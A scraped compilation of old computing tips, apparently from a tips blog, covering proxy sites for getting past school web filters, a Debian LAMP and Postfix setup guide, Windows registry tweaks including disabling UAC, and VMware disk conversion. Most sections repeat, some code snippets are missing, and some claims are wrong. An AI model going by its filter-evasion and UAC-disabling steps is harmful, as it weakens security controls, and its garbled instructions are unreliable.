Second Method:
Below are the list of various sites from which you can surf the blocked websites !
http://kproxy.com
http://backfox.com
http://atunnel.com
http://calculatepie.com
http://www.stupidcensorship.com
http://www.vmathpie.com
http://www.xroxee.com
http://mathtunnel.com
http://www.pagemod.com
Are you frustrated because you are not able to visit your favorite websites in your school or college or any place where some sites are blocked? There are two methods to access these sites:
First Method:
Search the banned website, for example www.pctipsntricks.wordpress.com in Google or Yahoo! search engine. Then open the cached copy of that page to access the website. You can get also cache link of that website, if you search in Google with keyword cache:[URL] and get cache link to access the website.
Second Method:
Below are the list of various sites from which you can surf the blocked websites !
http://kproxy.com
http://backfox.com
http://atunnel.com
http://calculatepie.com
http://www.stupidcensorship.com
http://www.vmathpie.com
http://www.xroxee.com
http://mathtunnel.com
http://www.pagemod.com
Set Processes Priority
Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.CTRL-SHIFT-ESC
1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option
2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD's
Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.CTRL-SHIFT-ESC
1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option
2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD's
Setting Up a Server on LINUX
Submited In : Operating Systems » Linux
date: 24 August 2008
Setting Up a Server on LINUX
This article teaches you, the reader, how to configure a GNU/Linux based server with three of the most important services that must be provided in a company, at home, a lab or anywhere else, both for clients and internal usage: web, database, mail. So it will be assumed that the idea is to host websites that use certain technologies such as a scripting language and a database (for dynamic sites), and also to act as a mailing tool, for sending and receiving email.
Consider that this article only shows some of the basic features for configuring these services, each program has much more in depth options. Entire books have been written just about Apache or MySQL. So, don't just stay with what you learn here, play around, read, learn; system administration is all about security and performance, so there's a lot more to discover.
I have also decided to show some optimization (tuning) techniques for a better performance. We will use only free/open source software in this article, thus,it is not necessary to buy commercial licenses. The software we will use is Debian GNU/Linux, Apache, MySQL, PHP and Postfix. The first three are what is called LAMP, where the P can stand for various server side scripting languages such as PHP, Perl and Python. In general, it represents the open source web platform (both for developing and using it). I have been using LAMP and Postfix for years and must say that, after trying lots of other programs of the same sort, it is the wisest choice if you want a powerful, easy to use/configure/maintain and secure server environment.
Why use Debian? I have always liked this distribution because it's easy to manage packages (programs) and system services. It is also very secure and stable, making it perfect for servers and any system that must run 24/7. It's huge package repository (over 15490) is more than enough to get the best use out of any computer system.
Why use Apache? Simple - it's currently the best, most secure and most used HTTP server. It also supports a huge amount of modules and extensions. Here are some specific benefits of Apache: support, efficiency, portability and customizability.
Why use MySQL? It's logo says it all: The world's most popular open source database. This DBMS is reliable, powerful and easy to manage and use. Also, we will use it with Postfix for better integration and performance.
Why use Postfix? If you ask any systems administrator why he/she uses Postfix as a Mail Transport Agent (MTA) the answer will be it's easy and fast. Another great feature is it's security and the wide amount of operating systems it can run on (BSD, Linux, AIX, Solaris, OSX, etc.)
Installing and Configuring Apache
We will use Apache 2 because it has been rewritten for better performance and security. It brings more out of the box optimizations for scalability and throughput, as opposed to version 1.3 (which is not even being maintained anymore). So let's get to it, we first download and install the essential software:\
apt-get install apache2
This will also install the following packages: apache2, apache2-common,apache2-mpm-worker and apache2-utils. Now, try connecting to localhost:80 and you should see a page saying that Apache as been configured correctly. If not,you might have something wrong with the network settings, but that's a whole different ball game. By default, when installing services in Debian it leaves them configured to start when you boot GNU/Linux so you don't have to worry about further system configuration. For controlling the daemon we have apache2clt or we can use Debian's init utilities:
/etc/init.d/apache2 start|stop|restart|reload|force-reload
apacheclt start|stop|restart|...
Apache2's configuration files, by default, are in /etc/apache2/. Whenever a configuration is modified, the server must be restarted. Here is a description of some of the more important files and directories:
* apache2.conf is where the main configuration is, it used to be httpd.conf, so don't be fooled.
* mods-available/ is the directory with all the modules that are available. The .load contain the Apache directives that are needed to load the modules. And the .conf are the configuration directives for each module.
* mods-enabled/ is the directory that contains the symbolic links to the modules that we want to enable from mod-available/. At least the .load file must be there, so we will have: /etc/apache2/mod-enabled/modulex.load -> /etc/apache2/mod-available/modulex.load
Let's take this to practice, say we want to enable user directories:
(http://www.myurl.com/~someuser/). First uncomment the following in apache2.conf:
Next, we create the symbolic links for this module and restart the server:
cd /etc/apache2
ln -s mods-available/userdir.* /etc/apache2/mods-enabled/
/etc/init.d/apache restart
This works for all the modules you want to load. Now let's try some optimization methods. Apache uses a great deal of resources, specially RAM, because it accumulates whatever is necessary to accommodate what it's serving and this process never decreases until it is complete. This takes up as much RAM as the largest dynamic script.
To help reduce this problem, edit apache2.conf and enable KeepAlive (increases time) and set a low value for KeepAliveTimout (this will reduce the time the process waits without doing anything). Also, set the value for MaxRequestsPerChild around 20, depending on the amount of dynamic sites the server is hosting. The idea behind this is that when the process ends, it makes it start over again, but with lower RAM usage. However, by doing this, you might have to increase MaxClients around 50%.
Installing and Configuring MySQL
MySQL 5 introduces a number of new features, compared to older versions, such as new data types, precision math, better performance for storage, faster queries and better handling of certain types. The list goes on, so I recommend checking out the official documentation to see how you can take advantage of the latest version. To get it:
apt-get install mysql-server-5.0
libdbd-mysql-perl, libmysqlclient15off, mysql-client-5.0 and mysql-common will also be installed. Debian will also make sure MySQL starts at boot time. To control the daemon, I use the init script and voila!:
/etc/init.d/mysql start|stop|restart|reload|force-reload|status
To first start working with this database, the root password must be set. The word root does not apply to the system's root, but to the database administrator, however, it can be the same person. So let's set it and log in:
mysqladmin -u root password 'thepassword'
mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10 to server version: 5.0.20a-Debian_1-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
If you don't like using the command line system (lazy sysadmins), there a couple graphical user interfaces for MySQL, such as MySQLCC (QT), gMySQLCC (GTK+), etc. Since everything is running fine (or should be) it's time to optimize. MySQL uses algorithms that let you run it with little memory, but you can give it options to increase the memory usage if you have more, and therefore increase performance. To lower the amount of time MySQL sits waiting, edit the configuration file: /etc/mysql/my.cnf and add/change the following (values may vary depending on your specific needs):
wait_timeout=60
connect_timeout=10
interactive_timeout=100
join_buffer_size=1M
query_cache_size=128M
query_cache_limit=2M
max_allowed_packet=16M
table_cache=1024
Installing and Configuring PHP
Now that we have our httpd server up and running we can setup PHP. Debian includes PHP5 in the official package repository, not too long ago only up to version 4 was supported. So let's get it:
apt-get install php5
Just like for Apache and MySQL, extra packages will have to be install as well: apache2-mpm-prefork, libapache2-mod-php5 and php5-common.
Now, add support for MySQL:
apt-get install php5-mysql
I also like to add some more packages for PHP, such as CLI, Pear, LDAP, IMAP, GD, mhash, ODBC and PostScript:
apt-get install php5-cli php-pear php5-ldap php5-imap php5-gd\
php5-mhash php5-odbc php5-ps
The configuration file for PHP is located in /etc/php5/apache2/php.ini, every time you modify it, Apache must be restarted. So let's see if everything is working. First let's create a simple script, called information.php, in Apache's DocumentRoot, that is /var/www/information.php and inside it should go:
Now, fireup a browser and open http://www.mycompany.com/information.php. You should see a page with information about the PHP version that is installed. Also it provides some details about Apache, and all the PHP modules. Last, but not least, let's make sure MySQL and PHP are working well together. First, log in to MySQL and create a new database:
mysql> create database test;
Query OK, 1 row affected (0.00 sec)
mysql> exit
Bye
'
Create a new file, db.php, in the same directory and write:
Check your browser and you should see: connection success. Now for a little optimization. Usually compiling PHP scripts on the fly uses a lot of memory, so if your hosting several big web sites and have lots of users visiting, you might want to do something about this resource abuse. The solution is to use a program that keeps the scripts precompiled. The most popular include Zend Accelerator, Turck MMCache and PHP Accelerator. Performance can increase up to 200%.
Finally LAMP is up, running and optimized. You can also provide further services, such as more databases (PosgreSQL, Oracle, Informix, etc) and more server side languages (Perl, JSP, Python, etc).
Installing and Configuring Postfix
Postfix was originally written as an alternative to Sendmail, which is used in most mail servers around the world. Unfortunately, Sendmail is hard to use (and manage) and very bug prone, therefore securing it can be quite a task. This is why Postfix is a fantastic option. Just like with the rest of the software, we download and install it, with support with MySQL:
apt-get install postfix postfix-mysql
Leave the values dpkg suggests when configuring. The default configuration files are in /etc/postfix, we will only use main.cf. Once done, we create the postfix user for MySQL and the database for the emails:
mysql -A -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.20a-Debian_2-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use mysql;
Database changed
mysql> insert into user (host, user, password) values ('localhost', 'postfix', password('thepostfixpass'));
Query OK, 1 row affected, 3 warnings (0.00 sec)
mysql> insert into db (host, db, user, select_priv) values ('localhost', 'mail', 'postfix', 'Y');
Query OK, 1 row affected (0.00 sec)
mysql> create database mail;
Query OK, 1 row affected (0.01 sec)
Afterward, MySQL must be restarted to use the new user and database. If everything worked correctly, then there shouldn't be any problem logging in as postfix using the mail database. So now we create our tables, as root:
mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3 to server version: 5.0.20a-Debian_2-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use mail;
Database changed
mysql> create table transport (
-> domain varchar(255) primary key,
-> transport char(8),
-> access varchar(2)
-> default 'OK');
Query OK, 0 rows affected (0.01 sec)
mysql> create table aliases (
-> id int(6),
-> alias varchar(255) primary key,
-> maildir varchar(255) not null,
-> access varchar(2)
-> default 'OK');
Query OK, 0 rows affected (0.00 sec)
mysql> create table remote_alias (
-> alias varchar(255) primary key,
-> rcpt varchar(255) not null);
Query OK, 0 rows affected (0.01 sec)
mysql> create table domain1 (
-> user varchar(255) primary key,
-> pass varchar(255) not null,
-> maildir varchar(255) not null,
-> active int(8)
-> default 1);
Query OK, 0 rows affected (0.00 sec)
The next step is configuring Postfix to support MySQL, so edit the configuration file and add:
transport_maps=mysql:/etc/postfix/transport.cf
virtual_mailbox_base=/home/postfix
virtual_uid_maps=mysql:/etc/postfix/ids.cf
virtual_gid_maps=mysql:/etc/postfix/ids.cf
virtual_mailbox_maps=mysql:/etc/postfix/aliases.cf
virtual_maps=mysql:/etc/postfix/remote_aliases.cf
Since we are specifying files that don't exist, we must create them. In transport.cf write:
user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=transport
select_field=transport
where_field=domain
hosts=localhost
user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=aliases
select_field=maildir
where_field=alias
hosts=localhost
In ids.cf:
user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=aliases
select_field=id
where_field=alias
hosts=localhost
And for the final file, remote_aliases.cf:
user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=remote_aliases
select_field=rcpt
where_field=alias
hosts=localhost
Lets now create the information for the domain1 example in MySQL:
mysql -A -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8 to server version: 5.0.20a-Debian_2-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use mail;
Database changed
mysql> insert into transport(domain, transport) values ('domain1.com', 'virtual:');
Query OK, 1 row affected (0.00 sec)
To add users to that domain, simply insert into the aliases table the data (you can get postfix's userid from /etc/passwd, for example:
mysql>insert into aliases values
(postfix_uid,'user@domain1.com','domain1/user', 'OK');
Finally everything should be working smoothly. Make sure you constantly check the logs (/var/log/mail.log), even if everything is normal, because the first place you might detect an attack is there.
Submited In : Operating Systems » Linux
date: 24 August 2008
Setting Up a Server on LINUX
This article teaches you, the reader, how to configure a GNU/Linux based server with three of the most important services that must be provided in a company, at home, a lab or anywhere else, both for clients and internal usage: web, database, mail. So it will be assumed that the idea is to host websites that use certain technologies such as a scripting language and a database (for dynamic sites), and also to act as a mailing tool, for sending and receiving email.
Consider that this article only shows some of the basic features for configuring these services, each program has much more in depth options. Entire books have been written just about Apache or MySQL. So, don't just stay with what you learn here, play around, read, learn; system administration is all about security and performance, so there's a lot more to discover.
I have also decided to show some optimization (tuning) techniques for a better performance. We will use only free/open source software in this article, thus,it is not necessary to buy commercial licenses. The software we will use is Debian GNU/Linux, Apache, MySQL, PHP and Postfix. The first three are what is called LAMP, where the P can stand for various server side scripting languages such as PHP, Perl and Python. In general, it represents the open source web platform (both for developing and using it). I have been using LAMP and Postfix for years and must say that, after trying lots of other programs of the same sort, it is the wisest choice if you want a powerful, easy to use/configure/maintain and secure server environment.
Why use Debian? I have always liked this distribution because it's easy to manage packages (programs) and system services. It is also very secure and stable, making it perfect for servers and any system that must run 24/7. It's huge package repository (over 15490) is more than enough to get the best use out of any computer system.
Why use Apache? Simple - it's currently the best, most secure and most used HTTP server. It also supports a huge amount of modules and extensions. Here are some specific benefits of Apache: support, efficiency, portability and customizability.
Why use MySQL? It's logo says it all: The world's most popular open source database. This DBMS is reliable, powerful and easy to manage and use. Also, we will use it with Postfix for better integration and performance.
Why use Postfix? If you ask any systems administrator why he/she uses Postfix as a Mail Transport Agent (MTA) the answer will be it's easy and fast. Another great feature is it's security and the wide amount of operating systems it can run on (BSD, Linux, AIX, Solaris, OSX, etc.)
Installing and Configuring Apache
We will use Apache 2 because it has been rewritten for better performance and security. It brings more out of the box optimizations for scalability and throughput, as opposed to version 1.3 (which is not even being maintained anymore). So let's get to it, we first download and install the essential software:\
apt-get install apache2
This will also install the following packages: apache2, apache2-common,apache2-mpm-worker and apache2-utils. Now, try connecting to localhost:80 and you should see a page saying that Apache as been configured correctly. If not,you might have something wrong with the network settings, but that's a whole different ball game. By default, when installing services in Debian it leaves them configured to start when you boot GNU/Linux so you don't have to worry about further system configuration. For controlling the daemon we have apache2clt or we can use Debian's init utilities:
/etc/init.d/apache2 start|stop|restart|reload|force-reload
apacheclt start|stop|restart|...
Apache2's configuration files, by default, are in /etc/apache2/. Whenever a configuration is modified, the server must be restarted. Here is a description of some of the more important files and directories:
* apache2.conf is where the main configuration is, it used to be httpd.conf, so don't be fooled.
* mods-available/ is the directory with all the modules that are available. The .load contain the Apache directives that are needed to load the modules. And the .conf are the configuration directives for each module.
* mods-enabled/ is the directory that contains the symbolic links to the modules that we want to enable from mod-available/. At least the .load file must be there, so we will have: /etc/apache2/mod-enabled/modulex.load -> /etc/apache2/mod-available/modulex.load
Let's take this to practice, say we want to enable user directories:
(http://www.myurl.com/~someuser/). First uncomment the following in apache2.conf:
Next, we create the symbolic links for this module and restart the server:
cd /etc/apache2
ln -s mods-available/userdir.* /etc/apache2/mods-enabled/
/etc/init.d/apache restart
This works for all the modules you want to load. Now let's try some optimization methods. Apache uses a great deal of resources, specially RAM, because it accumulates whatever is necessary to accommodate what it's serving and this process never decreases until it is complete. This takes up as much RAM as the largest dynamic script.
To help reduce this problem, edit apache2.conf and enable KeepAlive (increases time) and set a low value for KeepAliveTimout (this will reduce the time the process waits without doing anything). Also, set the value for MaxRequestsPerChild around 20, depending on the amount of dynamic sites the server is hosting. The idea behind this is that when the process ends, it makes it start over again, but with lower RAM usage. However, by doing this, you might have to increase MaxClients around 50%.
Installing and Configuring MySQL
MySQL 5 introduces a number of new features, compared to older versions, such as new data types, precision math, better performance for storage, faster queries and better handling of certain types. The list goes on, so I recommend checking out the official documentation to see how you can take advantage of the latest version. To get it:
apt-get install mysql-server-5.0
libdbd-mysql-perl, libmysqlclient15off, mysql-client-5.0 and mysql-common will also be installed. Debian will also make sure MySQL starts at boot time. To control the daemon, I use the init script and voila!:
/etc/init.d/mysql start|stop|restart|reload|force-reload|status
To first start working with this database, the root password must be set. The word root does not apply to the system's root, but to the database administrator, however, it can be the same person. So let's set it and log in:
mysqladmin -u root password 'thepassword'
mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10 to server version: 5.0.20a-Debian_1-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
If you don't like using the command line system (lazy sysadmins), there a couple graphical user interfaces for MySQL, such as MySQLCC (QT), gMySQLCC (GTK+), etc. Since everything is running fine (or should be) it's time to optimize. MySQL uses algorithms that let you run it with little memory, but you can give it options to increase the memory usage if you have more, and therefore increase performance. To lower the amount of time MySQL sits waiting, edit the configuration file: /etc/mysql/my.cnf and add/change the following (values may vary depending on your specific needs):
wait_timeout=60
connect_timeout=10
interactive_timeout=100
join_buffer_size=1M
query_cache_size=128M
query_cache_limit=2M
max_allowed_packet=16M
table_cache=1024
Installing and Configuring PHP
Now that we have our httpd server up and running we can setup PHP. Debian includes PHP5 in the official package repository, not too long ago only up to version 4 was supported. So let's get it:
apt-get install php5
Just like for Apache and MySQL, extra packages will have to be install as well: apache2-mpm-prefork, libapache2-mod-php5 and php5-common.
Now, add support for MySQL:
apt-get install php5-mysql
I also like to add some more packages for PHP, such as CLI, Pear, LDAP, IMAP, GD, mhash, ODBC and PostScript:
apt-get install php5-cli php-pear php5-ldap php5-imap php5-gd\
php5-mhash php5-odbc php5-ps
The configuration file for PHP is located in /etc/php5/apache2/php.ini, every time you modify it, Apache must be restarted. So let's see if everything is working. First let's create a simple script, called information.php, in Apache's DocumentRoot, that is /var/www/information.php and inside it should go:
Now, fireup a browser and open http://www.mycompany.com/information.php. You should see a page with information about the PHP version that is installed. Also it provides some details about Apache, and all the PHP modules. Last, but not least, let's make sure MySQL and PHP are working well together. First, log in to MySQL and create a new database:
mysql> create database test;
Query OK, 1 row affected (0.00 sec)
mysql> exit
Bye
'
Create a new file, db.php, in the same directory and write:
Check your browser and you should see: connection success. Now for a little optimization. Usually compiling PHP scripts on the fly uses a lot of memory, so if your hosting several big web sites and have lots of users visiting, you might want to do something about this resource abuse. The solution is to use a program that keeps the scripts precompiled. The most popular include Zend Accelerator, Turck MMCache and PHP Accelerator. Performance can increase up to 200%.
Finally LAMP is up, running and optimized. You can also provide further services, such as more databases (PosgreSQL, Oracle, Informix, etc) and more server side languages (Perl, JSP, Python, etc).
Installing and Configuring Postfix
Postfix was originally written as an alternative to Sendmail, which is used in most mail servers around the world. Unfortunately, Sendmail is hard to use (and manage) and very bug prone, therefore securing it can be quite a task. This is why Postfix is a fantastic option. Just like with the rest of the software, we download and install it, with support with MySQL:
apt-get install postfix postfix-mysql
Leave the values dpkg suggests when configuring. The default configuration files are in /etc/postfix, we will only use main.cf. Once done, we create the postfix user for MySQL and the database for the emails:
mysql -A -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.20a-Debian_2-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use mysql;
Database changed
mysql> insert into user (host, user, password) values ('localhost', 'postfix', password('thepostfixpass'));
Query OK, 1 row affected, 3 warnings (0.00 sec)
mysql> insert into db (host, db, user, select_priv) values ('localhost', 'mail', 'postfix', 'Y');
Query OK, 1 row affected (0.00 sec)
mysql> create database mail;
Query OK, 1 row affected (0.01 sec)
Afterward, MySQL must be restarted to use the new user and database. If everything worked correctly, then there shouldn't be any problem logging in as postfix using the mail database. So now we create our tables, as root:
mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3 to server version: 5.0.20a-Debian_2-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use mail;
Database changed
mysql> create table transport (
-> domain varchar(255) primary key,
-> transport char(8),
-> access varchar(2)
-> default 'OK');
Query OK, 0 rows affected (0.01 sec)
mysql> create table aliases (
-> id int(6),
-> alias varchar(255) primary key,
-> maildir varchar(255) not null,
-> access varchar(2)
-> default 'OK');
Query OK, 0 rows affected (0.00 sec)
mysql> create table remote_alias (
-> alias varchar(255) primary key,
-> rcpt varchar(255) not null);
Query OK, 0 rows affected (0.01 sec)
mysql> create table domain1 (
-> user varchar(255) primary key,
-> pass varchar(255) not null,
-> maildir varchar(255) not null,
-> active int(8)
-> default 1);
Query OK, 0 rows affected (0.00 sec)
The next step is configuring Postfix to support MySQL, so edit the configuration file and add:
transport_maps=mysql:/etc/postfix/transport.cf
virtual_mailbox_base=/home/postfix
virtual_uid_maps=mysql:/etc/postfix/ids.cf
virtual_gid_maps=mysql:/etc/postfix/ids.cf
virtual_mailbox_maps=mysql:/etc/postfix/aliases.cf
virtual_maps=mysql:/etc/postfix/remote_aliases.cf
Since we are specifying files that don't exist, we must create them. In transport.cf write:
user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=transport
select_field=transport
where_field=domain
hosts=localhost
user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=aliases
select_field=maildir
where_field=alias
hosts=localhost
In ids.cf:
user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=aliases
select_field=id
where_field=alias
hosts=localhost
And for the final file, remote_aliases.cf:
user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=remote_aliases
select_field=rcpt
where_field=alias
hosts=localhost
Lets now create the information for the domain1 example in MySQL:
mysql -A -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8 to server version: 5.0.20a-Debian_2-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use mail;
Database changed
mysql> insert into transport(domain, transport) values ('domain1.com', 'virtual:');
Query OK, 1 row affected (0.00 sec)
To add users to that domain, simply insert into the aliases table the data (you can get postfix's userid from /etc/passwd, for example:
mysql>insert into aliases values
(postfix_uid,'user@domain1.com','domain1/user', 'OK');
Finally everything should be working smoothly. Make sure you constantly check the logs (/var/log/mail.log), even if everything is normal, because the first place you might detect an attack is there.
IMPROVE XP SHUTDOWN SPEED
This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown.
Go to Start then select Run
Type 'Regedit' and click ok
Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now select 'HungAppTimeout'
Right click and select 'Modify'
Change the value to '1000' Click 'OK'
Watch Any Movie In Paint (100%) Working
* First start a movie in any player.
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint
*you can edit it also
* First start a movie in any player.
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint
*you can edit it also
To make folder delete protected
1)Right click on the folder
2)Then in the general tab click advanced (near read only option)
3)In that click encrypt contents to secure data.
4)This can happen if u run windows Xp and you have Ntfs file system on that particular drive and an administrative account.Its Workin ..!!
1)Right click on the folder
2)Then in the general tab click advanced (near read only option)
3)In that click encrypt contents to secure data.
4)This can happen if u run windows Xp and you have Ntfs file system on that particular drive and an administrative account.Its Workin ..!!
[How To] Permanently disable UAC in Windows 7 / Vista
User Account Control is a technique implemented in latest Windows Operating Systems to safeguard it from inexperienced computer users. It mainly aims at securing the system from accidental damages caused by users. But sometimes it may interfere in simple program installation or some other simple tasks. This may be annoying for users.
Here is a small step by step guide on disabling UAC in Windows 7 / Vista.
Go to start, type regedit.exe in searchbox and press enter.
Navigate to the following entry in Registry Editor.
HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Policies System
Now look for EnableLUA in right side pane. If the key is not there then create new DWORD with same name. Double click on the key and change its value to ’0′.
http://tipsfromgeek.com/wp-content/uploads/2010/07/Disable-uac-392-x-284.gif
Press OK, restart your computer and done.
User Account Control is a technique implemented in latest Windows Operating Systems to safeguard it from inexperienced computer users. It mainly aims at securing the system from accidental damages caused by users. But sometimes it may interfere in simple program installation or some other simple tasks. This may be annoying for users.
Here is a small step by step guide on disabling UAC in Windows 7 / Vista.
Go to start, type regedit.exe in searchbox and press enter.
Navigate to the following entry in Registry Editor.
HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Policies System
Now look for EnableLUA in right side pane. If the key is not there then create new DWORD with same name. Double click on the key and change its value to ’0′.
http://tipsfromgeek.com/wp-content/uploads/2010/07/Disable-uac-392-x-284.gif
Press OK, restart your computer and done.
The easy way to Fix your Task Manager
Task Manager has been disabled by your administrator
Have you encountered the error in your PC “Task Manager has been disabled by your administrator“ or your task manager has just suddenly stops working? This error message appears due to restriction placed in the Windows Registry. One can easily enable Task Manager by editing some registry settings. For a normal user editing registry is not easy and a bit risky. Well here is the instant solution to those common Task Manager common errors.
Task Manager Fix is a FREEWARE system utility to fix task manager disabled by spywares, trojans and displays error message : “Task Manager has been disabled by your administrator“, which blocks access to Windows Task Manager.
Task Manager Fix is designed to enable disabled Task Manager. Download the FREE Task Manager Fix tool to quickly enable Task Manager. Handy windows system recovery tool to remove task manager restrictions and effective solution to the problem - “Task Manager not Working”.
Task Manager has been disabled by your administrator
Have you encountered the error in your PC “Task Manager has been disabled by your administrator“ or your task manager has just suddenly stops working? This error message appears due to restriction placed in the Windows Registry. One can easily enable Task Manager by editing some registry settings. For a normal user editing registry is not easy and a bit risky. Well here is the instant solution to those common Task Manager common errors.
Task Manager Fix is a FREEWARE system utility to fix task manager disabled by spywares, trojans and displays error message : “Task Manager has been disabled by your administrator“, which blocks access to Windows Task Manager.
Task Manager Fix is designed to enable disabled Task Manager. Download the FREE Task Manager Fix tool to quickly enable Task Manager. Handy windows system recovery tool to remove task manager restrictions and effective solution to the problem - “Task Manager not Working”.
View Admin At welcome Screen
By default windows XP doesn't show the Administrator in the user list at the welcome screen. Here's a way to get around it.
Now head up to
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist
create a new DWORD entry and name it as Administrator and change its value to 1.
exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.
By default windows XP doesn't show the Administrator in the user list at the welcome screen. Here's a way to get around it.
Now head up to
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist
create a new DWORD entry and name it as Administrator and change its value to 1.
exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.
Convert VMware .vmdk to KVM .qcow2 or Virtualbox .vdi
I wrote this how to as I was having problems converting a VMware image to KVM. The existing tutorials all suggest using qemu-img to convert the .vmdk, however it was not working as qemu-img only supports VMware 3 and 4 compatible image formats.
At least that is what Google searching and reading the qemu man pages yielded after I got this error message :
qemu-img convert Ubuntu.vmdk -O qcow2 Ubuntu.qcow
qemu-img: Could not open ‘Ubuntu.qcow’
And to make matters worse, it was difficult to find any information on converting the .vmdk if it was split into multiple files.
This is how I ended up converting. You can convert from a .vdi or a “flat” .vmdk
First convert the .vmdk to a format compatible with qemu-img.
Turns out this can be done with vmware-vdiskmanager.
1. Converting from .vmdk
Use vmware-vdiskmanager to create a copy. This works with a single or multiple disks.
ls
Ubuntu.vmdk
Ubuntu-f001.vmdk
Ubuntu-f002.vmdk
Ubuntu-f003.vmdk ...
vmware-vdiskmanager -r Ubuntu.vmdk -t 0 Ubuntu-copy.vmdk
Note: If you have multiple disks, use Ubuntu.vmdk as well (you do not need to convert each Ubuntu-f001.vmdk).
Note: That is a -t Zero not a capital O. see man vmware-vdiskmanager.
Note: vmware-vdiskmanager is part of vmware server (and workstation, not sure about player).
2. Alternate – Converting “flat files”.
Flat files are used by vmware if you create a virtual disk (vmdk) with the “Allocate all disk space now” option (you have this option when creating disks for use with vmware). Flat files contain all the data from your .vmdk and can (usually) be converted directly.
Notice, flat files can be directly converted to .qcow. If you wish to convert to .vdi (VirtualBox) convert flat to raw.
KVM :
qemu-img convert Ubuntu-flat.vmdk -O qcow2 Ubuntu-copy.qemu
Note: That is a capital O qcow2
RAW (for VirtualBox)
qemu-img convert Ubuntu-copy.vmdk -O qcow2 Ubuntu-copy.qemu
Note: That is a capital O qcow2
3. Boot the image with KVM
kvm -hda Ubuntu-copy.qcow -net nic -net user -m 512
Caveats :
If you have vmware-tools installed, you will have mouse integration.
If you have vmware-tools installed, the guest desktop may well be larger then the kvm window. You will need to resize the guest display to 800×600 .
I could not convert a .vmdk which was using LVM (Fedora).
VirtualBox – Convert to .vdi
1. First use qemu-img to convert the copy .vmdk to raw.
qemu-img convert Ubuntu-copy.vmdk Ubuntu-copy.img
qemu-img with no options will make a raw image. If you prefer you can specify
qemu-img convert Ubuntu-flat.vmdk -O raw Ubuntu-copy.img
2. Then convert the raw image with VBoxManage
VBoxManage convertfromraw – -format VDI Ubuntu-copy.img Ubuntu-copy.vdi
Note: Two – - in front of “format” (Wordpress converts two – - to one long one).
3. Start VirtualBox, make a new machine or add the Ubuntu.vdi to an existing machine.
Caveats :
With VMWare-tools installed, Mouse integration did not work (as it did with KVM).
The resolution of the guest is also larger then the Virtualbox window.
I installed the VirtualBoxAdditions and guest resolution worked well, mouse integration, however, did not.
As always, I hope this helps. Converting usually went smoothly for me however there is the occasional .vmdk I could not convert.
I wrote this how to as I was having problems converting a VMware image to KVM. The existing tutorials all suggest using qemu-img to convert the .vmdk, however it was not working as qemu-img only supports VMware 3 and 4 compatible image formats.
At least that is what Google searching and reading the qemu man pages yielded after I got this error message :
qemu-img convert Ubuntu.vmdk -O qcow2 Ubuntu.qcow
qemu-img: Could not open ‘Ubuntu.qcow’
And to make matters worse, it was difficult to find any information on converting the .vmdk if it was split into multiple files.
This is how I ended up converting. You can convert from a .vdi or a “flat” .vmdk
First convert the .vmdk to a format compatible with qemu-img.
Turns out this can be done with vmware-vdiskmanager.
1. Converting from .vmdk
Use vmware-vdiskmanager to create a copy. This works with a single or multiple disks.
ls
Ubuntu.vmdk
Ubuntu-f001.vmdk
Ubuntu-f002.vmdk
Ubuntu-f003.vmdk ...
vmware-vdiskmanager -r Ubuntu.vmdk -t 0 Ubuntu-copy.vmdk
Note: If you have multiple disks, use Ubuntu.vmdk as well (you do not need to convert each Ubuntu-f001.vmdk).
